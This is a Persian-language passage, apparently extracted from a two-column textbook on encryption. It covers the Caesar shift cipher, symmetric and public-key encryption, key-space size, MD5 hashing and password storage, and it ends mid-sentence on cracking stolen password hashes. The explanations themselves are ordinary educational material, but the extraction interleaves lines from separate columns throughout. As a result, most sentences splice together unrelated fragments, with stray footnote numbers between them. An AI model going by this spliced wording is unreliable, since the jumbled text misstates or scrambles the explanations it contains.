ﺁﻧﻬﺎ ﺫﺧﻴـﺮﻩ ﻣـﻲﻛﻨﻨـﺪ .ﭘـﻴﺶ ﺍﺯ ﭘﻴـﺪﺍﻳﺶ Unicodeﺻـﺪﻫﺎ
ﺭﺍ ﺑﺎ ﺣﺮﻑ ﺑﻌﺪﻱ ﺁﻥ ﺟﺎﻳﮕﺰﻳﻦ ﻛﻨﻴﻢ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ:
ﺳﻴﺴﺘﻢ ﻛﺪﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺑﺮﺍﻱ ﺍﻳﻦ ﺗﺒﺪﻳﻼﺕ ﻭﺟﻮﺩ ﺩﺍﺷﺖ ،ﺍﻣﺎ
Bﺑﺠﺎﻱ Aﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛ ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﺣﺮﻭﻑ ﻭ ﻋﻼﺕ ﺭﺍ ﭘـﺸﺘﻴﺒﺎﻧﻲ
Cﺑﺠﺎﻱ Bﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛ ﻼ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎﻳﻲ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻧﻴﺎﺯ ﺑـﻪ ﭼﻨـﺪﻳﻦ ﻧﻤﻲﻛﺮﺩﻧﺪ؛ ﻭ ﻣﺜ ﹰ
Dﺑﺠﺎﻱ Cﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛ ﻛﺪﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺩﺍﺷﺖ ﺗﺎ ﺗﻤﺎﻣﻲ ﺯﺑﺎﻧﻬﺎﻱ ﺍﺭﻭﭘﺎﻳﻲ ﺭﺍ ﭘﻮﺷـﺶ
........ ﺩﻫﺪ .ﺣﺘﻲ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺯﺑﺎﻥ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﻣﺎﻧﻨـﺪ ﺍﻧﮕﻠﻴـﺴﻲ
Yﺑﺠﺎﻱ Xﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛ ﻧﻴــﺰ ﻳــﻚ ﻛﺪﮔــﺬﺍﺭﻱ ﻭﺍﺣــﺪ ﺑــﺮﺍﻱ ﺗﻤــﺎﻣﻲ ﺣــﺮﻭﻑ ،ﻋﻼﺋــﻢ ﻭ
Zﺑﺠﺎﻱ Yﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛ ﻋﻼﻣﺘﻬﺎﻱ ﺩﺳﺘﻮﺭﻱ ﻭ ﻓﻨﻲ ﻛﺎﻓﻲ ﻧﺒﻮﺩ.
Aﺑﺠﺎﻱ Zﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ )ﺩﺭ ﭘﺎﻳﺎﻥ ﺣﺮﻭﻑ ﺍﻟﻔﺒﺎ ،ﺩﻭﺑﺎﺭﻩ ﺑﻪ ﺣـﺮﻑ ﺍﻭﻝ
ﻫﻤﭽﻨﻴﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﺪﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺑﺎ ﻳﻜـﺪﻳﮕﺮ ﻧﺎﺳـﺎﺯﮔﺎﺭ
ﺑﺎﺯﮔﺸﺘﻪﺍﻳﻢ(.
ﺑﻮﺩﻧﺪ ،ﻳﻌﻨﻲ ﻣﻤﻜﻦ ﺑﻮﺩ ﺩﻭ ﺳﻴﺴﺘﻢ ﻛﺪﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺍﺯ ﺍﻋـﺪﺍﺩ
ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﻴﻢ ،ﻣﺜـﺎﻝ ﺫﻛـﺮ ﺷـﺪﻩ ﺗﺒـﺪﻳﻞ ﻣﺸﺎﺑﻬﻲ ﺑﺮﺍﻱ ﺩﻭ ﺣﺮﻑ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﻭ ﻳﺎ ﺑـﺮﺍﻱ ﻳـﻚ
ﻣﻲﺷﻮﺩ ﺑﻪ )ﻓﺎﺻﻠﻪ ﻭ ﻧﻘﻄﻪ ﺭﺍ ﺩﺭﻧﻈﺮ ﻧﮕﻴﺮﻳﺪ(: ﺣﺮﻑ ،ﺩﻭ ﻋﺪﺩ ﻣﺨﺘﻠﻒ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﺩﻩ ﺑﺎﺷـﻨﺪ .ﻫـﺮ ﺭﺍﻳﺎﻧـﻪ )ﺑـﻮﻳﮋﻩ
ﺑﺎﺷﻨﺪ( .ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺩﺭﺻﻮﺭﺗﻲ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﭘﻴـﺎﻡ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﻛﻨــﻮﻥ ﺍﻳــﻦ ﭘﻴــﺎﻡ ﺗﻐﻴﻴــﺮ ﻛــﺮﺩﻩ ﺍﺳــﺖ .ﺩﺭﻳﺎﻓــﺖﻛﻨﻨــﺪﻩ ﺁﻧــﺮﺍ
ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺍﺯ ﺟﺎﻳﻲ ﺑﻪ ﺟﺎﻱ ﺩﻳﮕﺮ ﺍﻧﺘﻘﺎﻝ ﺑﺮﻣﻲﮔﺮﺩﺍﻧﺪ ﻭ ﻫﺮ ﺣﺮﻑ ﺭﺍ ﺑﺎ ﺣﺮﻑ ﻗﺒﻠﻲ ﺧﻮﺩ ﺟﺎﻳﮕﺰﻳﻦ ﻣﻲﻛﻨﺪ
ﻼ ﺍﻧﺘﻘﺎﻝ ﺍﺯ ﻃﺮﻳـﻖ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺑـﻲﺳـﻴﻢ؛ ﻭ ﻳـﺎ ﺍﻳﻨﻜـﻪ ﺩﻫﻴﺪ ،ﻣﺜ ﹰ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺟﻤﻠﺔ ﺍﺻﻠﻲ ﺑﺪﺳﺖ ﻣﻲﺁﻳﺪ.
ﺑﺨﻮﺍﻫﻴــﺪ ﺍﻃﻼﻋــﺎﺕ ﻣﻮﺟــﻮﺩ ﺭﻭﻱ ﻳــﻚ ﺩﻳــﺴﻚ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ ﺑﺠﺎﻱ ﺁﻧﻜﻪ ﻫﺮ ﺣﺮﻑ ﺭﺍ ﻳﻚ ﻭﺍﺣﺪ ﺍﻧﺘﻘﺎﻝ ﺩﻫﻴﻢ ،ﻣﻲﺗﻮﺍﻧﻴﻢ ﺁﻧﻬﺎ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﺩﻳﮕﺮﺍﻥ ﻧﺘﻮﺍﻧﻨﺪ ﺁﻧﺮﺍ ﺑﺨﻮﺍﻧﻨﺪ .ﺩﺭ ﻣﻮﺍﺭﺩ ﺍﺧﻴﺮ ﺭﺍ ﭼﻨﺪ ﻭﺍﺣﺪ ﻣﻨﺘﻘﻞ ﻛﻨﻴﻢ .ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﻣﻘـﺪﺍﺭ ﺍﻳـﻦ
ﺍﮔﺮ ﻛﻠﻴﺪ ﻣﻔﻘﻮﺩ ﺷـﻮﺩ ﺍﻃﻼﻋـﺎﺕ ﺷـﻤﺎ ﻧﻴـﺰ ﻣﻄﻤﺌﻨـﹰﺎ ﺍﺯ ﺩﺳـﺖ ﺍﻧﺘﻘﺎﻝ ﺭﺍ ﺑﺪﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻤﺎﻳﺪ.
ﺭﻓﺘﻪﺍﻧﺪ.
ﺗﻌﺪﺍﺩ ﺗﻐﻴﻴﺮ ﻣﻜﺎﻥ ﻳﻚ ﺣﺮﻑ ﺭﺍ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ١٤١ﻣـﻲﮔﻮﻳﻨـﺪ.
ﺑﺨﺶ ﺩﻭﻡ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺯ ﺍﻳﻦ ﻋﺪﺩ ﻫﻢ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﭘﻴﺎﻡ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ ﻭ ﻫـﻢ
ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺁﻥ .ﺟﻮﻟﻴﻮﺱ ﺳﺰﺍﺭ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﺭﺳـﺎﻝ
ﺍﻳﻦ ﻧﻮﻉ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺸﺎﺑﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﺍﺳﺖ ،ﺍﻣﺎ ﺑﺎ ﻳـﻚ
ﭘﻴﺎﻣﻬﺎﻱ ﻣﺤﺮﻣﺎﻧـﻪ ﻭ ﺳـﺮﻱ ﺧـﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤـﻮﺩ )ﺍﻭ ﻛﻠﻴـﺪ
ﺗﻔﺎﻭﺕ ﻋﻤﺪﻩ :ﺑﺠﺎﻱ ﻳـﻚ ﻛﻠﻴـﺪ ،ﺩﺭ ﺁﻥ ﺩﻭ ﻛﻠﻴـﺪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ.
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﺑﺮ ﻋﺪﺩ ۳ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻩ ﺑﻮﺩ(.
ﺩﺭﻭﺍﻗﻊ ﺩﺭ ﺍﻳﻨﺠﺎ ﻛﻠﻴﺪﻱ ﻛـﻪ ﺑـﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﭘﻴـﺎﻡ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﮔﺮﺩﺩ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﻛﻠﻴﺪﻱ ﺍﺳﺖ ﻛـﻪ ﺑـﺮﺍﻱ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﭘﻴـﺎ ﹺﻡ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺳﺎﺩﻩ ﺍﮔﺮ ﭘﻴﺎﻡ ﺷﻤﺎ ﺩﺯﺩﻳـﺪﻩ ﺷـﻮﺩ ﻭ
ﻻ ﻛﻠﻴﺪ ﺍﻭﻝ ﻋﻤﻮﻣﻲ ﺍﺳـﺖ ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ .ﻣﻌﻤﻮ ﹰ ﺳﺎﺭﻕ ﻣﺘﻮﺟﻪ ﺭﻭﺡ ﻛﻠﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺸﻮﺩ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﺣﺪﺱ
ﻫﻤﻪ ﻣﺠﺎﺯﻧﺪ ﺍﺯ ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺍﮔﺮ ﺷﻤﺎ ﺑﺨﻮﺍﻫﻴﺪ ﺑﺮﺍﻱ ﺯﺩﻥ ﺑﺘﻮﺍﻧــﺪ ﻣﺤﺘــﻮﺍﻱ ﺁﻧــﺮﺍ ﺑﻔﻬﻤــﺪ .ﺩﺭﺻــﻮﺭﺗﻴﻜﻪ ﺍﻟﮕــﻮﺭﻳﺘﻢ
ﺷﺨﺼﻲ ﻳﻚ ﭘﻴﺎﻡ ﺧﺼﻮﺻﻲ ﺍﺭﺳﺎﻝ ﻛﻨﻴﺪ ﺑﺎﻳﺪ ﺍﺯ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﭘﻴﭽﻴﺪﻩﺗﺮ ﺍﺯ ﺁﻥ ﺑﺎﺷﺪ ﻛﻪ ﺑﺎ ﺍﻋﻤﺎﻝ ﭼﻨﺪ ﺟﺎﺑﺠﺎﻳﻲ ﺑﺘﻮﺍﻥ ﺁﻧﺮﺍ ﭘﻴﺪﺍ
ﻭﻱ -ﻛﻪ ﺧﻮﺩ ﺍﻭ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻫﻤﻪ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﻛﺮﺩ ﺁﻧﮕﺎﻩ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺑﺴﻴﺎﺭ ﻣﺸﻜﻠﺘﺮ ﺧﻮﺍﻫﺪ ﺷﺪ .ﺗﺎ ﻣﺪﺗﻲ ﭘﻴﺶ
-ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ .ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﭘﻴﺎﻡ ،ﻧﻴﺎﺯ ﺑﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻌـﺪﺩﻱ ﺍﺯ ﺍﻳـﻦ ﺭﻭﺵ ﺳـﺎﺩﻩ ﺍﻧﺘﻘـﺎﻝ
ﻭﻱ ﻣﻲﺑﺎﺷﺪ ﻛﻪ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺳﺖ ﻭ ﺍﻳـﻦ ﻛﻠﻴـﺪ ﺭﺍ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻧﺪ.
ﻧﺒﺎﻳﺪ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﻳﮕﺮﺍﻥ ﻗﺮﺍﺭ ﺩﺍﺩ .ﺑﺎ ﺍﻳﻦ ﺗﻮﺿﻴﺤﺎﺕ ﺍﻣﺮﻭﺯﻩ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺑﺠـﺎﻱ ﺍﻧﺘﻘـﺎﻝ ﺣـﺮﻭﻑ ﺍﺯ ﻓﺮﻣﻮﻟﻬـﺎﻱ
ﻣﺸﺨﺺ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﭘﻴﺎﻡ ﺷﻤﺎ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﻣﻜـﺎﻧﻴﺰﻡ ﺭﻳﺎﺿﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ .ﺍﻟﺒﺘـﻪ ﻫﻨـﻮﺯ ﻫـﻢ ﺍﺯ ﻛﻠﻴـﺪ ﺍﺳـﺘﻔﺎﺩﻩ
ﺑﺮﺍﻱ ﻛﺴﻲ ﺍﺭﺳﺎﻝ ﺷﻮﺩ ،ﻫﻴﭻ ﺷـﺨﺺ ﺩﻳﮕـﺮﻱ ﺑﺠـﺰ ﮔﻴﺮﻧـﺪﺓ ﻣــﻲﻛﻨــﻴﻢ ﻭ ﺍﻳــﻦ ﻛﻠﻴــﺪ ﺑﺨــﺸﻲ ﺍﺯ ﺁﻥ ﻓﺮﻣــﻮﻝ ﺑــﺮﺍﻱ ﺍﻧﺠــﺎﻡ
ﺣﻘﻴﻘﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺑﺨﻮﺍﻧﺪ. ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺖ .ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﭘﻴﺎﻣﻲ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﻴﺪ ﺣﺘﻤـﹰﺎ
ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ،ﺷﺨﺺ ﻣﻄﻤﺌﻦ ﺑﺎﻳﺪ ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ .ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﻛﻠﻴـﺪ ﻣﺨـﺼﻮﺹ ﺭﺍ
ﻧﻴﺴﺖ ﭼﻪ ﻛﺴﻲ ﭘﻴﺎﻡ ﺭﺍ ﺑﺮﺍﻱ ﻭﻱ ﺍﺭﺳﺎﻝ ﻛﺮﺩﻩﺍﺳﺖ؛ ﺯﻳـﺮﺍ ﻫـﺮ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻛﻠﻴﺪﻫﺎﻱ ﺩﻳﮕﺮ ﺭﺍ ﺍﻣﺘﺤﺎﻥ ﻛﻨﻴﺪ ﺗـﺎ ﺑـﻪ
ﻛﺴﻲ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ ﻭﻱ ﺭﺍ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ .ﺍﻣـﺎ ﺟﻮﺍﺏ ﺑﺮﺳﻴﺪ .ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻛﻠﻴﺪ ﻣﺤﺪﻭﺩ ﺑﻪ ﺷﻤﺎﺭﻩﻫﺎﻱ ۱ﺗﺎ ۱۰
ﻓﺮﺳﺘﻨﺪﻩ ﻣﻄﻤﺌﻦ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﺗﻨﻬﺎ ﺻﺎﺣﺐ ﺁﻥ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﻼﺑﺎﺷﺪ ،ﻋﻤﻠﻴﺎﺕ ﺣﺪﺱ ﺯﺩﻥ ﺯﻳﺎﺩ ﻃﻮﻝ ﻧﻤﻲﻛﺸﺪ .ﺍﻣـﺎ ﺍﮔـﺮ ﻣـﺜ ﹰ
)ﻛﻠﻴﺪﻱ ﻛﻪ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻜﺎﺭ ﺭﻓﺘﻪ( ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ ﻣﻴﺎﻥ ﺍﻋﺪﺍﺩ ۱ﺗﺎ ۱۰۰ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻛﻤـﻲ ﺑﻴـﺸﺘﺮ ﺯﻣـﺎﻥ
ﻣﺘﻨﺎﻇﺮ ﺍﻳﻦ ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ ﻭ ﺑﺨﻮﺍﻧﺪ. ﻻ ﺍﻋﺪﺍﺩ ﺩﻭﺩﻭﻳﻲ ۱۲۸ﺑﻴﺘـﻲ ﻫـﺴﺘﻨﺪ. ﺑﺒﺮﺩ .ﺍﻣﺮﻭﺯﻩ ﻛﻠﻴﺪﻫﺎ ﻣﻌﻤﻮ ﹰ
ﺍﻳﻦ ﺭﻗﻢ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺮﺍﺑﺮ ﺑﺎ:
ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﻋﻜﺲ ﺁﻧﭽﻪ ﮔﻔﺘﻪ ﺷﺪ
۳۴۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰
ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﻧﺪ .ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺷﻤﺎ ﭘﻴﺎﻡ ﺭﺍ ﺑـﺎ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ
ﺍﻧﺘﺨﺎﺏ ﻣﺨﺘﻠﻒ ﺍﺳﺖ ﻛﻪ ﺣﺪﺱ ﺯﺩﻥ ﺻـﺤﻴﺢ ﻛﻠﻴـﺪ ﺭﺍ ﺗﻘﺮﻳﺒـﹰﺎ
ﺧﻮﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻴﺪ ﻭ ﻫﺮ ﻛﺴﻲ ﻛﻪ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﺷـﻤﺎ ﺭﺍ
ﻏﻴﺮ ﻣﻤﻜﻦ ﻣﻲﻛﻨﺪ.
ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻤﺎﻳﺪ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺁﻧﭽـﻪ
ﺑﻪ ﺍﺛﺒﺎﺕ ﻣﻲﺭﺳﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻄﻤﺌﻨـﹰﺎ ﻓﺮﺳـﺘﻨﺪﺓ ﭘﻴـﺎﻡ ﻛـﺴﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﻫﻨﮕﺎﻣﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ ﻛـﻪ
ﻧﻴﺴﺖ ﺟﺰ ﺷﻤﺎ. ﻓﺮﺳﺘﻨﺪﻩ ﻭ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﻳﻚ ﻛﻠﻴـﺪ ﻣـﺸﺎﺑﻪ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﻨﺪ )ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﻛﻠﻴﺪ ﻣﺸﺨﺺ ﺑﻪ ﺗﻮﺍﻓﻖ ﺭﺳـﻴﺪﻩ
ﻳﻜﺴﺎﻥ ﺑﻮﺩﻥ ﺁﻧﻬﺎ ﻣـﺸﺨﺺ ﻣـﻲﺷـﻮﺩ ﻛـﻪ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻳﻜﻄﺮﻓﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ
ﺻﺤﻴﺢ ﺑﻮﺩﻩ ﺍﺳﺖ .ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﻛﺎﺭﺑﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ١٤٢
ﺩﺭﻫﻢﺳﺎﺯﻱ
ﻲ ﺁﻧﭽـﻪ ﻛـﻪ ﺭﻭﻱ ﺩﻳـﺴﻚ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩ ﻛﻨﺪ ﺭﻣﺰﮔﺸﺎﻳ ﹺ
ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻧﻴﺴﺖ ﻭ ﺑﺎﻳﺪ ﻳﻚ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺟﺪﻳـﺪ ﺍﻧﺘﺨـﺎﺏ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﻳﻦ ﺭﻭﺵ ﺭﺍ ﻣﺸﺎﺑﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﺑﺪﺍﻧﻴـﺪ
ﮔﺮﺩﺩ .ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻛﻪ ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻫﻴﭽﻜﺲ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻧـﺪﺍﺭﺩ .ﺑﻨـﺎﺑﺮﺍﻳﻦ
ﺍﺻﻞ ﺭﻣﺰ ﻋﺒﻮﺭ ﻫﻴﭽﮕﺎﻩ ﻧﺘﻮﺍﻧﺪ ﺩﺭ ﻗﺎﻟﺐ ﺍﺻﻠﻲ ﺧـﻮﺩ ﺑـﻪ ﻣﻄﺎﻟﺐ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﻧﺪ ،ﺍﻣﺎ ﻧﻤﻲ ﺗﻮﺍﻧﻨـﺪ ﺭﻣﺰﮔـﺸﺎﻳﻲ
ﻧﻤﺎﻳﺶ ﺩﺭﺁﻳﺪ. ﮔﺮﺩﻧﺪ؛ ﻭ ﺗﻔﺎﻭﺕ ﺁﻥ ﺑﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﺩﺭ ﺍﻳـﻦ ﺍﺳـﺖ
ﻻ ﺣﺪﺍﻛﺜﺮ ﻃﻮﻝ ﻣﺸﺨﺼﻲ ﺩﺍﺭﺩ .ﻳﻜـﻲ ﺍﺯ ﻛﻪ ﭘﻴﺎﻡ ﺭﻣﺰﺷﺪﻩ ﻣﻌﻤﻮ ﹰ
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻨﻮﺯ ﻳﻚ ﻣﺸﻜﻞ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑـﻪ ﺩﻟﻴـﻞ ﺁﻥ
ﺭﺍﻳﺠﺘــﺮﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬــﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻳﻜﻄﺮﻓــﻪ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ
ﻛﺎﺭﺑﺮ ﻧﺒﺎﻳﺪ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻛﻮﺗـﺎﻩ ،ﺳـﺎﺩﻩ ﻭ ﻳـﺎ ﻗﺎﺑـﻞ
ﺩﺭﻫــﻢﺳــﺎﺯﻱ ،ﺍﻟﮕــﻮﺭﻳﺘﻤﻲ ﺑﻨــﺎﻡ ١٤٣MD5ﺍﺳــﺖ .ﺧﺮﻭﺟــﻲ
ﺣﺪﺱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻭ ﺁﻥ ﺍﻳﻨﻜﻪ ﺍﮔـﺮ ﻛـﺴﻲ ﻓﻬﺮﺳـﺘﻲ ﺍﺯ
ﺍﻟﮕﻮﺭﻳﺘﻢ ،MD5ﻫﻤﻴﺸﻪ ۱۲۸ﺑﻴﺖ ) ۱۶ﺑﺎﻳـﺖ( ﻣـﻲﺑﺎﺷـﺪ .ﺍﮔـﺮ
ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﺭﻣﺰﮔ ـﺬﺍﺭﻱﺷــﺪﻩ ﺑﺪﺳــﺖ ﺁﻭﺭﺩ )ﻣــﺜ ﹰ
ﻼ ﺍﺯ
ﻳﻚ ﻛﺪ ﺩﺭﻫﻢﺳﺎﺯﻱﺷﺪﻩ ﺑﺮﺍﻱ ﺩﻭ ﭘﻴـﺎﻡ ﻣﺘﻔـﺎﻭﺕ ﺍﻳﺠـﺎﺩ ﻛﻨﻴـﺪ
ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺑﻪ ﺁﻥ ﻧﻔﻮﺫ ﻛﺮﺩﻩ( ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﻛـﻪ
